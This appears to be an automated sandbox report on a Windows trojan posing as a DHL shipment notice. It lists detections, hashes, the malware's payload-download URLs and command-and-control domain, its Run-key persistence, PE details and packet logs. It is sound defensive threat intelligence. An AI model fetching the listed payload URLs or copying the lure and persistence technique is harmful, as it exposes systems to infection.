DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	18%	ReversingLabs	Win32.Trojan.Mucc
DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe	100%	Avira	HEUR/AGEN.1141869

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
2.2.DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141869		Download File
2.0.DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141869		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://178.32.63.50/moss/Host_AKhLBP62.bin	0%	Avira URL Cloud	safe
http://178.32.63.50/moss/Host_AKhLBP62.bin:	0%	Avira URL Cloud	safe
http://178.32.63.50/moss/Host_AKhLBP62.binF	0%	Avira URL Cloud	safe
http://178.32.63.50/boss/Host_AKhLBP62.bin	0%	Avira URL Cloud	safe
http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
septnet.duckdns.org	193.104.197.28	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://178.32.63.50/moss/Host_AKhLBP62.bin	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://178.32.63.50/moss/Host_AKhLBP62.bin:	ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://178.32.63.50/moss/Host_AKhLBP62.binF	ieinstal.exe, 00000006.00000002.318237025480.0000000003229000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://178.32.63.50/boss/Host_AKhLBP62.bin	ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://178.32.63.50/moss/Host_AKhLBP62.binhttp://178.32.63.50/boss/Host_AKhLBP62.binwininet.dllMozil	ieinstal.exe, 00000006.00000002.318237428388.00000000035C0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.104.197.28	septnet.duckdns.org	unknown		1299	TELIANETTeliaCarrierEU	true
178.32.63.50	unknown	France		16276	OVHFR	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1360
Start date:	27.09.2021
Start time:	12:51:29
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 13m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@3/1@1/2
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 84% Number of executed functions: 35 Number of non-executed functions: 24
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe Excluded IPs from analysis (whitelisted): 20.54.122.82, 20.82.207.122, 209.197.3.8, 20.50.102.62, 93.184.221.240, 40.112.88.60, 67.27.157.126, 67.26.83.254, 67.26.81.254, 8.248.119.254, 67.27.159.126 Excluded domains from analysis (whitelisted): fg.download.windowsupdate.com.c.footprint.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, wd-prod-cp.trafficmanager.net, arc.msn.com, wu.azureedge.net, wd-prod-cp-eu-north-1-fe.northeurope.cloudapp.azure.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:54:11	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Halvngen7 C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe
12:54:19	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Halvngen7 C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
178.32.63.50	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	178.32.63.50/mt/nansept_YbjxsPwq12.bin
178.32.63.50	nSOA_Statement-of-Account_desk-of-account-receivable-june-august-2021-cummulative.exe	Get hash	malicious	Browse	178.32.63.50/ma/Host_wfKdFDKfLU89.bin

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	Claim-838392655-09242021.xls	Get hash	malicious	Browse	51.89.115.111
	2PzMc3x4WP.exe	Get hash	malicious	Browse	87.98.153.120
	e5jVcbuCo5.exe	Get hash	malicious	Browse	176.31.32.199
	i7qUJCnMz0.exe	Get hash	malicious	Browse	176.31.32.199
	zsChlwJrkj.exe	Get hash	malicious	Browse	176.31.32.199
	claim.xls	Get hash	malicious	Browse	51.89.115.111
	9uHCz7MrjF.exe	Get hash	malicious	Browse	176.31.32.199
	J1IYv644YS.exe	Get hash	malicious	Browse	51.254.69.209
	b3astmode.arm7	Get hash	malicious	Browse	37.187.28.233
	J7SOJRlEly.exe	Get hash	malicious	Browse	51.91.193.179
	SE6Hlp3GfE.exe	Get hash	malicious	Browse	176.31.32.199
	TxIlr8dCCJ.exe	Get hash	malicious	Browse	176.31.32.199
	xZqtlgwoWq.exe	Get hash	malicious	Browse	176.31.32.199
	XwfWWIkABj.exe	Get hash	malicious	Browse	51.254.84.37
	w86r2qGEjf.exe	Get hash	malicious	Browse	176.31.32.199
	xd.arm7	Get hash	malicious	Browse	164.133.71.222
	HYmN4qwdBc.exe	Get hash	malicious	Browse	51.91.236.193
	gXH3oSVmWj.exe	Get hash	malicious	Browse	176.31.32.199
	ylSBV0EjG1.exe	Get hash	malicious	Browse	176.31.32.199
	hfs.exe	Get hash	malicious	Browse	94.23.66.84
TELIANETTeliaCarrierEU	0HXxUcP5S4	Get hash	malicious	Browse	217.212.229.228
	S7wQtTgZBF	Get hash	malicious	Browse	104.123.190.203
	rod3gmxCHK	Get hash	malicious	Browse	178.76.5.162
	i686	Get hash	malicious	Browse	178.76.5.180
	Booking-Confirmation-1KT277547_ref-5002o2q2XYK-ref_1KT277547_ref-5002o2q2XYK.exe	Get hash	malicious	Browse	193.104.197.30
	1JFod4taFm	Get hash	malicious	Browse	193.45.0.22
	ofgE8wetW4	Get hash	malicious	Browse	213.155.150.24
	jew.x86	Get hash	malicious	Browse	80.239.196.190
	vigmCKdmz9	Get hash	malicious	Browse	178.78.11.99
	tohlIdtsnN	Get hash	malicious	Browse	62.115.122.3
	YQqx8LTbmF	Get hash	malicious	Browse	62.115.122.8
	DbGr5tUs3N	Get hash	malicious	Browse	193.45.0.10
	sora.x86	Get hash	malicious	Browse	80.239.148.228
	HsQg5UkrWY	Get hash	malicious	Browse	209.170.88.177
	HtxD2FSo8o	Get hash	malicious	Browse	178.76.30.223
	JMn71TLrES	Get hash	malicious	Browse	217.212.230.150
	frKG4b8C9c	Get hash	malicious	Browse	62.115.56.113
	NVwuK32YYU	Get hash	malicious	Browse	23.52.153.3
	E8BpDKVKq3	Get hash	malicious	Browse	80.239.196.196
	hVb7idLnyv	Get hash	malicious	Browse	178.76.30.221

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\LABERT\Cirkusforestillinger.exe Download File
Process:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
File Type:	data
Category:	dropped
Size (bytes):	98305
Entropy (8bit):	5.8045067757228095
Encrypted:	false
SSDEEP:	768:I7nneTCCOKskAtEcDpHR0QWNTsO85zCoLi/0Fqt1fgg9ZPxt/ZbwKbdU5p0y:MnWAT4sO87LFIl3Ph2cy
MD5:	DA500D43204B3E3DFEA43798760ED75D
SHA1:	206EE6A976EC8582810DB1EF8C6ED81599F24355
SHA-256:	7B5C4219B3D03A3F8FF154FBAE97DA72A5E640AE13E7A414B2746804DBF2B8F8
SHA-512:	2AA6347B81287C525262059C1B36CD1892603EC4BEF1A1CB1F112BEB83B67029C0EC4EEC61E22B834B591EF866480384164279FC3BDA8532D5828A040DB6AFB5
Malicious:	false
Reputation:	low
Preview:	.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM.SM.SM..Q..RM..o.uM.ek.RM.RichSM.................PE..L.....I.................P...@...............`....@..................................j......................................TM..(...........................................................................0... ....................................text....A.......P.................. ..`.data...\ ...`.......`..............@....rsrc................p..............@..@...I............MSVBVM60.DLL............................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.804544485598051
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DHL_Shipment_Notification_1231413385_Notification_1231413385_september2021.exe
File size:	98304
MD5:	8e2b177d2ab29c95f067559a029cf5e8
SHA1:	f347fa229d51836344ab5bf89fa531e19aa5e324
SHA256:	b9fdde7d748e27a130c509a589a2c8b92aad279604d3e4ee7ac28187fc5660be
SHA512:	29493bc83ab2348c5f3f707079e968302e03256acd3801d9c5e47c13a87cb9ec70145208bb25a4127e30cbe2cd7edca1a6cd82a23ca7a5e5a8a0bb0a19e1aa00
SSDEEP:	768:37nneTCCOKskAtEcDpHR0QWNTsO85zCoLi/0Fqt1fgg9ZPxt/ZbwKbdU5p0:TnWAT4sO87LFIl3Ph2c
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..uM..ek..RM..RichSM..................PE..L......I.................P...@...............`....@........

File Icon


Icon Hash:	20047c7c70f0e004

Static PE Info

General
Entrypoint:	0x4012f0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x49E892D2 [Fri Apr 17 14:31:46 2009 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	508f324e8f3f3b33e0170cdca30d1edb

Entrypoint Preview

Instruction
push 00401E1Ch
call 00007F98A8D959C5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
dec eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], dh
fistp word ptr [eax+7B83299Ch]
dec ebx
mov ah, 62h
or bh, ch
movsd
xor al, cl
inc edx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
add al, 00h
add byte ptr [eax], al
inc edx
jnc 00007F98A8D95A3Eh
jns 00007F98A8D95A46h
je 00007F98A8D95A37h
insb
jnc 00007F98A8D95A37h
jnc 00007F98A8D95A41h
bound ebp, dword ptr [edx+65h]
imul esi, dword ptr [ebp+72h], 73h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
add eax, CFE82B41h
inc esi
inc ebx
sub byte ptr [ebp-44h], al
in al, dx
push ecx
hlt
imul ecx, eax, 24h
cld
and dh, FFFFFF8Eh
jmp 00007F98A8D95A36h
fcmovnb st(0), st(1)
inc ebx
mov byte ptr [edx+56BAFCB5h], al
aam 89h
cmp cl, byte ptr [edi-53h]
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
inc eax
add dword ptr [eax], eax
add byte ptr [eax+eax+00h], dl
add byte ptr [eax], al
adc al, 00h
push ebx
insb
popad
je 00007F98A8D95A38h
imul esi, dword ptr [esi+67h], 73h
insd

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14d54	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x19000	0x8e4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x104	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x141f0	0x15000	False	0.50043015253	data	6.21499607809	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x16000	0x205c	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x19000	0x8e4	0x1000	False	0.169921875	data	1.92865182643	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x197b4	0x130	data
RT_ICON	0x194cc	0x2e8	data
RT_ICON	0x193a4	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x19374	0x30	data
RT_VERSION	0x19150	0x224	data	Chinese	Taiwan

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaExitProc, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarDup, __vbaStrToAnsi, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0404 0x04b0
InternalName	VOLDFRELSERS
FileVersion	1.00
CompanyName	Seismic
ProductName	Barkerne8
ProductVersion	1.00
OriginalFilename	VOLDFRELSERS.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	Taiwan

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/27/21-12:54:11.229766	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49806	80	192.168.11.20	178.32.63.50
09/27/21-12:54:15.667402	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	54150	1.1.1.1	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2021 12:54:11.211550951 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.229293108 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.229574919 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.229765892 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.300846100 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.300967932 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.301052094 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.301079035 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.301104069 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.301424026 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.318528891 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.318638086 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.318690062 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.318840027 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.318875074 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.318901062 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.318952084 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.319000006 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.319046021 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.319233894 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.336420059 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336574078 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336679935 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.336698055 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336751938 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336813927 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336863995 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336921930 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.336942911 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.336976051 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337025881 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337073088 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337160110 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337172985 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337207079 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.337296009 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.337423086 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.354671955 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.354825974 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.354952097 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.354952097 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355000019 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355063915 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355142117 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355148077 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355211973 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355259895 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355303049 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355307102 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355343103 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355377913 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355453968 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355460882 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355531931 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355583906 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355616093 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355624914 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355648041 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355700016 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355741978 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355778933 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355851889 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355895996 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355902910 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355937004 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.355951071 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.355998993 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.356004000 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.356045008 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.356086969 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.356091976 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.356138945 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.356184959 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.356185913 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.356240034 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.356321096 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.356401920 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.373742104 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.373841047 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374006987 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374023914 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374058008 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374072075 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374104977 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374150991 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374193907 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374233007 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374345064 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374365091 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374392986 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374439955 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374485970 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374531984 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374531984 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374578953 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374624968 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374670029 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374680042 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374716043 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374718904 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374762058 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374785900 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374808073 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374852896 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374856949 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374903917 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374948978 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.374960899 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.374994993 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375015020 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375041962 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375087976 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375096083 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375133991 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375175953 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375180006 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375226974 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375267029 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375272989 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375319958 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375319958 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375370026 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375411034 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375449896 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375483036 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375528097 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375598907 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375621080 CEST	80	49806	178.32.63.50	192.168.11.20
Sep 27, 2021 12:54:11.375680923 CEST	49806	80	192.168.11.20	178.32.63.50
Sep 27, 2021 12:54:11.375699997 CEST	80	49806	178.32.63.50	192.168.11.20
